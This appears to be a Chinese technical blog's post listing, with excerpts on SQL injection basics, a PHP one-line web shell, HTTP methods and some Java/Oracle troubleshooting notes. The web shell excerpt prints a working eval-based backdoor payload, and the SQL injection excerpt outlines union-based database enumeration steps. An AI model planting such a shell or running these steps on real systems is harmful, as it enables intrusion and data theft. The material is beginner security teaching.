- 博客(6)
- 收藏
- 关注
原创 SQL注入基础
一、SQL注入条件1、程序没有对输入进行严格的过滤2、输入的语句能够被带入数据库中执行二、SQL注入步骤Step1:判断是否存在注入字符型数字型Step2:获取数据库信息1、order by 数字用于判断列数2、union合并多条语句的查询结果3、select 1,2数据显示位4、获取用户、数据库版本、数据库select users();select version();select database();5、使用information_schema数据库①scheme
2021-11-30 21:50:41
3360
原创 PHP一句话木马及变形
PHP的一句话木马@ 表示忽略报错$_POST 表示使用post的方式提交变量attack代表为变量名<?php @eval($_POST['attack'])?>上传木马使用实例:
2021-11-25 20:26:14
2615
原创 HTTP的几种请求方法
HTTP的几种请求方法方法作用支持版本GET获取资源1.0、1.1POST传输实体主体1.0、1.1HEAD获取报文首部1.0、1.1PUT传输文件1.0、1.1DELETE删除文件1.0、1.1OPTIONS询问支持的方法1.1TRACE追踪路径1.1CONNECT要求用隧道协议连接代理1.1LINK建立和资源之间的连接1.0UNLINK断开连接关系1.0在对网页进行安全测试时,可以
2021-11-23 21:35:13
1633
原创 ssm框架查询结果为空,单独在数据库中查询有值 oracle
同样的语句,在sqlplus里就能查出值但是在ssm框架里面就是null仔细检测了Result的字段对应上了前情提要:我之前在sqlplus里手动update一些数据仔细检查后,发现是因为我update后没有commit,所以ssm里面查不到值被我自己蠢哭一定要注意不管是insert还是update,操作完之后都要commit!!...
2020-04-02 17:57:38
468
原创 SpringSecurity 跳转失败
使用SpringSecurity登录后跳转报错我的SpringSecurity版本是4.1要在spring-security.xml配置文件中加上hasRole源代码:<security:intercept-url pattern="/index.jsp" access="permitAll()"/> <security:intercept-url pa...
2020-02-15 22:46:41
465
原创 IDEA创建maven项目报错[ERROR] Maven execution terminated abnormally (exit code 1)
试了网上很多帖子好好配置了setting.xml,和idea里的setting,改完都没有用其实认真读读这句话,问题就很明显了,是maven的问题在idea里提供的终端里面输入mvn -X然后会出现各种报错,慢慢改这些报错,然后新建项目就OK了...
2020-02-06 20:07:33
220
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人